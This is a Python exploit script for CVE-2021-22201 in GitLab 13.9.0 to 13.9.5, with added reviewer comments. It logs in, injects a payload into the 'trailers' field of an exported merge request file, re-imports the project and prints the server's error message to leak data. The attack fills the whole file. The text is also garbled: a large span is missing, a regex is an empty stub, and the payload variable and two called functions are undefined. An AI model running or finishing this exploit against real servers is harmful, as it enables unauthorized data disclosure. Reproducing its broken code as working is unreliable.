# Script for CVE-2021-22201 (per its own banner: 13.9.0 <= GitLab < 13.9.5).
#
# Visible flow: log in -> create a project -> ... -> rewrite the exported
# merge_requests.ndjson -> re-import the archive -> print the exception
# message the server reports for the import -> clean up.
#
# NOTE(review): the copy of this file that was reviewed had lost its line
# breaks and a large span in the middle (see the marker inside
# create_project).  get_project_id() and delete_project() are called below
# but are not defined in the visible text; restore them from the original
# file before running anything.
import os
import re
import sys
import tarfile
from json import loads
from shutil import rmtree
from time import sleep
from uuid import uuid1

import requests

LOGIN_URI = '/users/sign_in'
CREATE_URI = '/projects/new'
IMPORT_API = '/api/v4/projects/%s/import'
PROJECT_URI = '/%s/'
NEW_PROJECT = '/projects/new'
BRANCH_URI = '/%s/%s/-/branches/new'
PATH = os.path.dirname(__file__)
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
# Not referenced by any code visible in the reviewed text.
proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}

# One shared HTTP session so cookies set at login are reused by later calls.
session = requests.session()

# Module-level state shared between the steps below.
base_url = None
token = None
namespace_id = None
project_name = None
project_id = None
branch_name = None

# The group must be named "token": get_token() reads .group('token').
# (The reviewed copy had the group name stripped, which made the pattern
# invalid and re.compile raise at import time.)
token_reg = re.compile(r'name="authenticity_token" value="(?P<token>.*?)"')
project_reg = re.compile(r'.*?ID: (\d+)')


def banner():
    """Print the script banner and usage line."""
    # NOTE(review): the banner presumably spanned several lines originally;
    # the text is kept exactly as it appears in the reviewed copy.
    print(""" ---------- CVE-2021-22201 ---------- ---------- 13.9.0 <= Gitlab < 13.9.5 ---------- Author: Search?=Null ---- Usage: python3 CVE-2021-22201.py url username password """)


def get_token(uri, regex=False):
    """Fetch the CSRF token from a page and store it in the global ``token``.

    Args:
        uri: Path appended to ``base_url`` to build the page URL.
        regex: Optional pattern; when truthy its first capture group is used
            instead of the default ``token_reg`` pattern.

    Exits the process (status 0) when the pattern does not match.  Any other
    exception raised while extracting the token is printed and swallowed.
    The HTTP request itself is outside the ``try`` and may raise.
    """
    global token
    url = base_url + uri
    req = session.get(url, headers=HEADERS)
    req_text = req.text
    try:
        if not regex:
            token = token_reg.search(req_text).group('token')
        else:
            token = re.search(regex, req_text).group(1)
        print(f'[+] Get token: {token}')
    except AttributeError:
        # .search() returned None: the page did not contain a token.
        print('[-] Line 60 Failed to obtain token.')
        sys.exit(0)
    except Exception as e:
        print(f'[-] Line 63 Error: {e}')


def login(user, pass_):
    """Log in with the given credentials, then continue with create_project().

    Args:
        user: Value sent as ``user[login]``.
        pass_: Value sent as ``user[password]``.

    The outcome is only reported on stdout; request errors are printed and
    swallowed.
    """
    url = base_url + LOGIN_URI
    get_token(LOGIN_URI)
    data = {
        'utf8': '✓',
        'authenticity_token': token,
        'user[login]': user,
        'user[password]': pass_,
        'user[remember_me]': 0
    }
    try:
        # Redirects are not followed so the 302 itself can be inspected.
        req = session.post(url, headers=HEADERS, data=data, allow_redirects=False)
        if req.status_code == 302 and 'redirected' in req.text:
            print('[+] Login Success.')
        elif req.status_code == 200 and 'Invalid Login or password' in req.text:
            print('[-] Line 83: Invalid Login or password.')
    except Exception as e:
        print('[-] Line 85 Login failed. ' + str(e))
    # NOTE(review): indentation was lost in the reviewed copy; this call is
    # assumed to sit at function level, i.e. it runs whatever the login
    # outcome was.
    create_project()


def create_project():
    """Create a project; the project name uses random characters.

    NOTE(review): this function is incomplete in the reviewed copy -- see
    the marker in the body.
    """
    global PROJECT_URI
    global project_name
    global project_id
    global namespace_id
    url = base_url + CREATE_URI[:9]  # not used in the visible text
    get_token(CREATE_URI)
    project_name = str(uuid1())[:8]
    r = session.get(base_url + CREATE_URI, headers=HEADERS)
    # ------------------------------------------------------------------
    # NOTE(review): SOURCE IS TRUNCATED HERE.  Everything between the start
    # of the pattern below and the `try:` that follows is missing from the
    # reviewed copy (presumably stripped as markup).  As written,
    # re.search() is called with a single argument and raises TypeError.
    # The statements after it use `filepath` and `payload`, which nothing
    # visible defines, so they presumably belong to a later function.
    # Left exactly as found; restore from the original file.
    # ------------------------------------------------------------------
    namespace_id = re.search(r' ')
    try:
        output_path = os.path.join(PATH, 'export')
        if not os.path.exists(output_path):
            t = tarfile.open(filepath)
            os.mkdir(output_path)
            t.extractall(path=output_path)
            t.close()
        file_path = os.path.join(output_path, 'tree', 'project', 'merge_requests.ndjson')
        with open(file_path, 'r') as f:
            content = re.sub(r'"trailers":.*?}]', '"trailers":"%s"}]' % payload, f.read())
        with open(file_path, 'w+') as fp:
            fp.write(content)
        # with tarfile.open(os.path.join(PATH, 'payload.tar.gz'), 'w:gz') as tar:
        payload_file = tarfile.open(os.path.join(PATH, 'payload.tar.gz'), 'w:gz')
        payload_file.add(output_path, arcname='.')
        payload_file.close()
        print('[+] Add payload success.')
        os.remove(filepath)
    except Exception as e:
        print(f'[-] Line 298 Error: {e}')
    import_project()


def import_project():
    """Upload ``payload.tar.gz`` as a new project and print the import error.

    Posts the archive from ``PATH`` to ``/import/gitlab_project`` under a
    random 8-character name, waits five seconds, then queries ``IMPORT_API``
    for that project.  When the response is a 200 containing
    ``JSON::Schema::JsonParseError`` its JSON is parsed and the first
    ``failed_relations`` entry's ``exception_message`` is printed.  The
    project and the local artefacts are removed afterwards.

    Relies on ``get_project_id`` and ``delete_project``, which are not
    defined in the visible part of the file.
    """
    get_token(NEW_PROJECT)
    url = base_url + '/import/gitlab_project'
    name = str(uuid1())[:8]
    data = {
        'utf8': '✓',
        'authenticity_token': token,
        'name': name,
        'namespace_id': namespace_id,
        'path': name,
    }
    # The context manager closes the archive even if the upload raises
    # something other than Exception (e.g. KeyboardInterrupt).
    with open(os.path.join(PATH, 'payload.tar.gz'), 'rb') as f:
        project_file = {'file': f}
        try:
            req = session.post(url, headers=HEADERS, data=data, files=project_file)
            if req.status_code == 302 and 'redirected' in req.text:
                print('[+] Uploaded project success.')
        except Exception as e:
            print(f'[-] Line 319 Error: {e}')

    sleep(5)
    id_ = get_project_id(name)
    url = base_url + IMPORT_API % (str(id_))

    # Stays None when the request fails or the response is not the expected
    # one; previously the print below raised NameError in that case.
    content = None
    try:
        r = session.get(url, headers=HEADERS)
        if r.status_code == 200 and 'JSON::Schema::JsonParseError' in r.text:
            content = loads(r.text)
    except Exception as e:
        print(f'[-] Line 329 Error: {e}')

    delete_project(name)
    if content is None:
        print('[-] Import status did not contain the expected error message.')
    else:
        print('\n\n' + content['failed_relations'][0]['exception_message'] + '\n\n')
    delete_all()


def delete_all():
    """Remove the local ``payload.tar.gz`` and ``export`` directory under PATH.

    Errors are printed and swallowed.  If removing the archive fails, the
    directory removal is skipped because both share one ``try``.
    """
    try:
        os.unlink(os.path.join(PATH, 'payload.tar.gz'))
        print('[+] Deleteed file payload.tar.gz success.')
        rmtree(os.path.join(PATH, 'export'), ignore_errors=True)
        print('[+] Deleteed dir export succcess.')
    except Exception as e:
        print(f'[-] Line 342 Error: {e}')


def main():
    """Parse ``url username password`` from argv and start the login step.

    Exits with status 0 (after printing the banner) when fewer than three
    arguments are given.  A URL without an ``http://`` or ``https://``
    prefix gets ``http://`` prepended; trailing slashes are removed.
    """
    global base_url
    global username
    banner()
    if len(sys.argv) < 4:
        sys.exit(0)
    url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    # The previous check joined the two negated prefix tests with `or`,
    # which is always true, so "http://" was prepended even to URLs that
    # already had a scheme.
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    base_url = url.rstrip('/')
    login(username, password)


if __name__ == '__main__':
    main()